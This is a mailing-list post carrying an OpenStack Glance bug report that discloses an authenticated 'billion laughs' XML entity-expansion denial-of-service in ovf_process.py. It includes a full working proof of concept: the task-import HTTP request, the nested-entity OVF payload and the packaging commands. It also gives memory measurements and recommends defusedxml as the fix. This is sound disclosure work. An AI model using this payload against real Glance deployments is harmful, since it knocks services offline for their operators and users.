[Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py

Charles Neill charles.neill at rackspace.com
Thu Sep 29 21:09:03 UTC 2016


@Brian: Thanks for the follow-up. I was just trying to figure out
whether "work_dir" is commonly enabled by operators or not (which is
kind of like asking you to look into an "operator crystal ball", I
realize). I know that it must be specified manually, and that it would
likely only be enabled if Tasks access was desired - I was just trying
to assess whether enabling Tasks is something that happens 10% of the
time or 90% of the time. At this point, barring any further comments, it
seems the answer is that this is rare.

@Ian: We're not trying to push some hidden agenda here. I think my
questions have been pretty clear, and focused on one thing: Is this
something most reasonable operators enable? I can't quantify this bug's
likelihood of impact if I don't at least have a fuzzy answer to that
question. My goal was simply to understand how much exposure there is
likely to be in the community, and to align the response we make with
the actual risk that is presented. Based on what I've seen, an OSSN
seems reasonable.

I bring up Keystone credentials (as used in many OpenStack services -
not Glance, specifically) merely as an example of a configuration
variable without a default value, but that would not make sense to leave
undefined in 90% of situations. Without opinions from people more
knowledgeable about Glance than myself, I can't make that determination.

My guess is that we are using incompatible definitions of the phrase "by
default." My take is, if it enables functionality that most sane
operators want/need, and is therefore defined in almost all cases, it is
a de-facto default whether or not there is a sane default provided in
the service's example configuration file. It seems your definition is
"is this specified in the configuration file by default," which I
already know the answer to (no). So far I have not received an explicit
answer to my question, but as stated above, I guess I have to assume
that this means operator usage is not common.

-- 
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1625402

Title:
  Authenticated "Billion laughs" memory exhaustion / DoS vulnerability
  in ovf_process.py

Status in Glance:
  Opinion
Status in OpenStack Security Advisory:
  Opinion

Bug description:
  Creating a task to import an OVA file with a malicious OVF file inside
  it will result in significant memory usage by the glance-api process.

  This is caused by the use of the xml.etree module in ovf_process.py
  [1] [2] to process OVF images extracted from OVA files with
  ET.iterparse(). No validation is currently performed on the XML prior
  to parsing.

  As outlined in the Python documentation, xml.etree is vulnerable to
  the "billion laughs" vulnerability when parsing untrusted input [3]

  Note: if using a devstack instance, you will need to edit the
  "work_dir" variable in /etc/glance/glance-api.conf to point to a real
  folder.

  -----------------------------------------
  Example request
  -----------------------------------------

  POST /v2/tasks HTTP/1.1
  Host: localhost:1338
  Connection: close
  Accept-Encoding: gzip, deflate
  Accept: application/json
  User-Agent: python-requests/2.11.1
  Content-Type: application/json
  X-Auth-Token: [ADMIN TOKEN]
  Content-Length: 287

  {
      "type": "import",
      "input": {
          "import_from": "http://127.0.0.1:9090/laugh.ova",
          "import_from_format": "raw",
          "image_properties": {
              "disk_format": "raw",
              "container_format": "ova",
       "name": "laugh"
          }
      }
  }

  -----------------------------------------
  Creating the malicious OVA/OVF
  -----------------------------------------

  "laugh.ova" can be created like so:

  1. Copy this into a file called "laugh.ovf":
  <?xml version="1.0"?>
  <!DOCTYPE lolz [
   <!ENTITY lol "lol">
   <!ELEMENT lolz (#PCDATA)>
   <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
   <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
   <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
   <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
   <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
   <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
   <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
   <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
   <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
   <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
  ]>
  <lolz>&lol10;</lolz>

  2. Create the OVA file (tarball) with the "tar" utility:

      $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova

  3. (Optional) If you want to serve this from your devstack instance
  (as in the request above), run this in the folder where you created
  the OVA file:

      $ python -m SimpleHTTPServer 9090

  -----------------------------------------
  Performance impact
  -----------------------------------------
  Profiling my VM from a fresh boot:

  $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  After submitting this task twice (repeating calls to the above
  command):

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  Object     Metric               Values
  ---------- -------------------- --------------------------------------------
  devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
  devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
  devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

  After submitting enough of these requests at once, glance-api runs out
  of memory and can't restart itself. Here's what the log looks like
  after the "killer request" [4]

  -----------------------------------------
  Mitigation
  -----------------------------------------

  Any instances of xml.etree should be replaced with their equivalent in
  a secure XML parsing library like defusedxml [5]

  1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
  2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
  3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
  4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
  5: https://pypi.python.org/pypi/defusedxml

  -----------------------------------------
  Other
  -----------------------------------------
  Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue).

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions




More information about the Openstack-security mailing list